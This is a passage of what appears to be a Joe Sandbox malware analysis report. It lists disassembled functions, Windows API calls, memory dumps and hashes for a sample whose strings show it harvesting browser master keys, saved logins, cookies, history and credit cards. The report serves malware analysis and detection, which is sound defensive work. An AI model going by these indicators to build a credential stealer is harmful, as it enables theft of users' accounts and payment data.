                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: GlobalLock$Bytes$Create$AllocClassDocfileObjectOpenStorageUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3681960158-0
                                                                                                                                              • Opcode ID: b2b2bea8cbad52ffde94552cb1eeef876acfceeb8123a82e964a875202a98a95
                                                                                                                                              • Instruction ID: afee7d1c3fb3890a556bcd0f298f766d1f0dc21064698dd4bbe6f21a1270b98b
                                                                                                                                              • Opcode Fuzzy Hash: b2b2bea8cbad52ffde94552cb1eeef876acfceeb8123a82e964a875202a98a95
                                                                                                                                              • Instruction Fuzzy Hash: 92C11C70A00209EFCB14DF55C988AAFBBB9FF89704B20455AF811DB250D7B5D981CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257C2A1 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 295COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • nametitlebodystruct RecvSfilemaster_keyprofileslocal_statelogin_datacookieshistorycreditcardslocalstate_cachelogins_master_keyextensionsFailed building the Runtime, xrefs: 0257C3A0
                                                                                                                                              • APPDATA, xrefs: 0257C521
                                                                                                                                              • path*fatal runtime error: I/O error: operation failed to complete synchronously, xrefs: 0257C3CD
                                                                                                                                              • a Display implementation returned an error unexpectedly, xrefs: 0257C303
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: APPDATA$a Display implementation returned an error unexpectedly$nametitlebodystruct RecvSfilemaster_keyprofileslocal_statelogin_datacookieshistorycreditcardslocalstate_cachelogins_master_keyextensionsFailed building the Runtime$path*fatal runtime error: I/O error: operation failed to complete synchronously
                                                                                                                                              • API String ID: 0-422089487
                                                                                                                                              • Opcode ID: 63c197539a810d0b83383016462f31c8edbb396b8ecde12b7cabf8b566e8d0ea
                                                                                                                                              • Instruction ID: e6209194fec4b157882ace4b4be3748fccbda0f896ec9bf6dc65841d6b214a04
                                                                                                                                              • Opcode Fuzzy Hash: 63c197539a810d0b83383016462f31c8edbb396b8ecde12b7cabf8b566e8d0ea
                                                                                                                                              • Instruction Fuzzy Hash: B5C16CB5A083419FD724CF28D480B5AFBE2BFC8314F04892EE99997351EB71D945CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257777B Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 292memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578000
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                                • Part of subcall function 025D04D0: TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                                • Part of subcall function 025D04D0: BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02577B96
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578019
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579F7C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579FA0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02579FBA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$Value$CryptRandom
                                                                                                                                              • String ID: `async fn` resumed after completion
                                                                                                                                              • API String ID: 740635937-507674517
                                                                                                                                              • Opcode ID: 7d3862ba67f9844112b50aa66a2f0692e0d817a07a08f93a8811b0819240a8a8
                                                                                                                                              • Instruction ID: 7b01656576d9c215a9a08717cb0110e64239c70b00b86f811cba95ae87b3ca4c
                                                                                                                                              • Opcode Fuzzy Hash: 7d3862ba67f9844112b50aa66a2f0692e0d817a07a08f93a8811b0819240a8a8
                                                                                                                                              • Instruction Fuzzy Hash: 42E1D170A44782DFD729CF28D444B96FBE2BF89300F04862AD99D97391DB74A854CF86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041E74E Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCPInfo.KERNEL32(00000000,?,0043B308,00000038,0041B383,?,00000000,00000000,00417F33,00000000,00000000,0043A9D8,0000001C,00417C5C,00000001,00000020), ref: 0041E78F
                                                                                                                                              • GetCPInfo.KERNEL32(00000000,00000001), ref: 0041E7A2
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00417F33,?,00000000,00000000), ref: 0041E7E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info$ByteCharMultiWide
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1166650589-0
                                                                                                                                              • Opcode ID: d74cba8254ec2bfd0c144a8bf9bd115fbbb8afc32ca4826cef1f7a671004a385
                                                                                                                                              • Instruction ID: fc1a395a9e190c6ff5981a5420c4fd796a0b1c48162dbb2f99a844a39120510b
                                                                                                                                              • Opcode Fuzzy Hash: d74cba8254ec2bfd0c144a8bf9bd115fbbb8afc32ca4826cef1f7a671004a385
                                                                                                                                              • Instruction Fuzzy Hash: 5D516B75900218EBCF219F56CC449DFBBB8EF89764F24412AF825A6290D7399C81CB68
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025C7320 Relevance: 10.7, APIs: 7, Instructions: 169filememoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(?,00120114,000000EF,E8F289D9,?,00000000,00000000), ref: 025C747B
                                                                                                                                              • GetLastError.KERNEL32 ref: 025C7498
                                                                                                                                              • SetFileInformationByHandle.KERNEL32(00000000,00000006,00000000,00000008), ref: 025C74C3
                                                                                                                                              • GetLastError.KERNEL32 ref: 025C74E1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,025CA785,?), ref: 025C7501
                                                                                                                                              • GetLastError.KERNEL32 ref: 025C750C
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 025C7519
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$FileHandle$CloseCreateFreeHeapInformation
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4103088332-0
                                                                                                                                              • Opcode ID: fbdfd72c518f04a0695e1ae7d12ed98450e4d1f1813a4ee3b79acb53f73e10d1
                                                                                                                                              • Instruction ID: 49815ff8d1e7f0bb199d3bb2458d509b8636c0c7fd42695f1b6078daf0f22988
                                                                                                                                              • Opcode Fuzzy Hash: fbdfd72c518f04a0695e1ae7d12ed98450e4d1f1813a4ee3b79acb53f73e10d1
                                                                                                                                              • Instruction Fuzzy Hash: 1F51C3709043409FEB248F64C48476AFFE9BF89714F24895DEC968B686E374C445CF59
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D7DA Relevance: 10.7, APIs: 7, Instructions: 160COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: c99945b730b1963bc2476f908b4b7e966ae24083794790fc4a804f60559a5f7f
                                                                                                                                              • Instruction ID: deba55917dce0b94424f7e82dae8a9b9b47db0b8bf94c504a8a5c0270682857a
                                                                                                                                              • Opcode Fuzzy Hash: c99945b730b1963bc2476f908b4b7e966ae24083794790fc4a804f60559a5f7f
                                                                                                                                              • Instruction Fuzzy Hash: 2C519072D00319EFDF21EFA4D884AEEBBB5BF04310F90452AF511A7150D774A945CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D6E6 Relevance: 10.7, APIs: 7, Instructions: 158COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: 21f38ccec4fa0e8b30d552f577ba58be143ccf844956009ce64557762c5bc80d
                                                                                                                                              • Instruction ID: 03b0e499ed1856b55c8dcbea2a45d420b7c6c419c53f8268e212c6394d836cd7
                                                                                                                                              • Opcode Fuzzy Hash: 21f38ccec4fa0e8b30d552f577ba58be143ccf844956009ce64557762c5bc80d
                                                                                                                                              • Instruction Fuzzy Hash: 22516D71E00319EFDF20EFA4E884AEEBBB5BF08300F90452AF555A7251D7789945CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D803 Relevance: 10.7, APIs: 7, Instructions: 158COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: 0f93b15981eb83b0008622cebca6e7edd8fc0778c5b73fd08b63520a5e626df8
                                                                                                                                              • Instruction ID: 6e50089abeb2bdf91b19714a5c651368d8dc676127325ce66d1f1f29e3b16f1f
                                                                                                                                              • Opcode Fuzzy Hash: 0f93b15981eb83b0008622cebca6e7edd8fc0778c5b73fd08b63520a5e626df8
                                                                                                                                              • Instruction Fuzzy Hash: 69517D71E00319EFDF24EFA4E884AEEBBB9BF04300F90452AF551A7250D7789945CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D72A Relevance: 10.7, APIs: 7, Instructions: 156COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: 827ef1f6ee7b75c145e33e34f9742a54bc848cad72a190445feeb5b0033f898c
                                                                                                                                              • Instruction ID: f237654dfe9b0de4e7d9c7904e21352c824fde659a4a83de7e0f8eff9bac242a
                                                                                                                                              • Opcode Fuzzy Hash: 827ef1f6ee7b75c145e33e34f9742a54bc848cad72a190445feeb5b0033f898c
                                                                                                                                              • Instruction Fuzzy Hash: D3516F71E00319EFDF20EFA4D884ADEBBB9BF08300F90452AF555A7250D7749945CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D7CA Relevance: 10.7, APIs: 7, Instructions: 156COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: 4a061ed6ea16155ebb7b5c787c568175eb317ebc6f7b48173005574961f5fb9e
                                                                                                                                              • Instruction ID: 58d113b5c7ff70747419b4c64d9a6ceb5b586f213f15031ce77f902832e347a1
                                                                                                                                              • Opcode Fuzzy Hash: 4a061ed6ea16155ebb7b5c787c568175eb317ebc6f7b48173005574961f5fb9e
                                                                                                                                              • Instruction Fuzzy Hash: 11518F71E00319EFDF20EFA4E884AEEBBB9BF04300F90452AF555A7151D7789A45CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D704 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: 4a58fbb225a2fce4e96c6b3d3fef4f7e5c10f5cde4fd159727c4ed86734b3cd6
                                                                                                                                              • Instruction ID: d151c50cc6bd0b404945a1303f62b0d198eee01f47ec1073862221912eaef73a
                                                                                                                                              • Opcode Fuzzy Hash: 4a58fbb225a2fce4e96c6b3d3fef4f7e5c10f5cde4fd159727c4ed86734b3cd6
                                                                                                                                              • Instruction Fuzzy Hash: 2F515D71E00319EFDF20EFA4E884AEEBBB9BF08300F90452AF555A7150D7789955CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D717 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: f8144347606935d44715553dcabef8512d41d4be27142094d4e387c2cc9881f5
                                                                                                                                              • Instruction ID: 53aae2873ea59daa80941dbbe4e8aa903fbf7bb4d0a1552b06bc64d0b7892529
                                                                                                                                              • Opcode Fuzzy Hash: f8144347606935d44715553dcabef8512d41d4be27142094d4e387c2cc9881f5
                                                                                                                                              • Instruction Fuzzy Hash: 8D515D71E00319EFDF20EFA4E884AEEBBB9BF08300F90452AF555A7150D7789955CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D6D6 Relevance: 10.7, APIs: 7, Instructions: 153COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: 7face730e7ea03213b5efd70eacd7ec68c2f0d51a1f73f596c044cdcc9c12fd8
                                                                                                                                              • Instruction ID: 78637e40a941fc69885a3deb517414403bef0f341df32ec1c30b1b6a81e673a2
                                                                                                                                              • Opcode Fuzzy Hash: 7face730e7ea03213b5efd70eacd7ec68c2f0d51a1f73f596c044cdcc9c12fd8
                                                                                                                                              • Instruction Fuzzy Hash: A2517F71E00319EFDF20EFA4E884AEEBBB9BF04300F90452AF555A7150D7749A45CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D6F6 Relevance: 10.7, APIs: 7, Instructions: 153COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
